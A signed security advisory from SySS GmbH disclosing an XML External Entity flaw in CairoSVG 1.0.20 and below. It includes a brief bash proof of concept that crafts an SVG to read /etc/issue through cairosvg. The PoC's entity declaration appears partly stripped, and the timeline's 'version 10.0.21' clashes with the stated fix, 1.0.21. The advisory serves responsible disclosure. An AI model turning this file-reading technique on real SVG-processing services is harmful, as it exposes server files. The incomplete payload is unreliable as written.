-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2016-036 Product: CairoSVG Vendor: Kozea Affected Version(s): 1.0.20 and below Tested Version(s): 1.0.20 Vulnerability Type: Improper Restriction of XML External Entity Reference ('XXE') (CWE-611) Risk Level: High Solution Status: Fixed Vendor Notification: 2016-06-10 Solution Date: 2016-06-14 Public Disclosure: 2016-07-21 CVE Reference: Not assigned Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: CairoSVG[2] is a software which can be used to process or convert SVG images. By failing to validate user input properly, this software is susceptible to XML External Entity Injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Using a crafted SVG image, it is possible to read out arbitrary files in the context of the current user. If CairoSVG is used in the context of a web application, this might lead to remote file disclosure. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Run the following script on a linux shell. The resulting pdf file /tmp/issue will contain an image with the content of /etc/issue. #!/bin/bash cat << EOF > /tmp/evil.svg ]> test &xxe; test EOF cairosvg -o /tmp/issue.pdf /tmp/evil.svg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Upgrade to version 1.0.21 or later ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2016-04-27: Vulnerability discovered 2016-06-10: Vulnerability reported to vendor 2016-06-10: Release of CairoSVG version 10.0.21 2016-07-21: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] SySS GmbH, SYSS-2016-036 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-036.txt [2] CairoSVG, Homepage http://cairosvg.org/ [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: Security vulnerability found by Franz G. Jahn of the SySS GmbH. E-Mail: franz.jahn (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc Key ID: 0xD06A14DE Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJXjjVnAAoJENWmFJbQahTecUMP/iWXwXTy1H7e7A/lZfX+aaTl UV5Cmt9OclwHZe4m6HY7ejuIFIvd+VGQd8cyk2jBw9Wf/HwNY4uRsl6W2uV+RqOg f9ogiCbTFCk7Vb4ph409BEn52Abu9KApRLJnON6LxfnK3imP7xyerO3b+Cb+AT6d 5CLJVctpW6E9V099lKb7f//QXlQHWM1uSN/g3WgLWNMn8MTcvYBxkMew+WjNlWo2 U4Ppu8fE2kQz+K8h5l28UsTwEFYsNDcFj6ZiX8BvNIWCJ3f44S+CgDh8hbrXJ1MZ JS7Ln5o0s90hD9/9HITMjrj5kj0Q/ujioNVnbhjZ6pQvr+sy3/9I3TI1/TgGM75/ NbHtXXUYwjkmKJmtGrb3ulzY2g1AVolC3T9e4ZAXX46xhUf0vFIxP2QcVat0HZ1Q ikHTE7y1hhcqcUWljUv0EAASCMSWwA28/hHI6An91JrAA8obWzGDOp4ROc0U1qzc V4Eco57dJntMHXhMk+R6amrm6Xj1I66CmyCDeWoV2RS7/rwSJOdC46JpxNVCkqQc eaV/jqJjKdhG9v0aMHR/H86GIILTMVPAro/4d++SMB9TK2WUMCbQ4gtJs/O0J10l 60uoidYrco9s89urBex1slSsp0AjxuDWFOShhbz8M3g+mHXyiFMsde+eZk5xXSoR ieApcQn78DUkd/N0ummV =JTwr -----END PGP SIGNATURE-----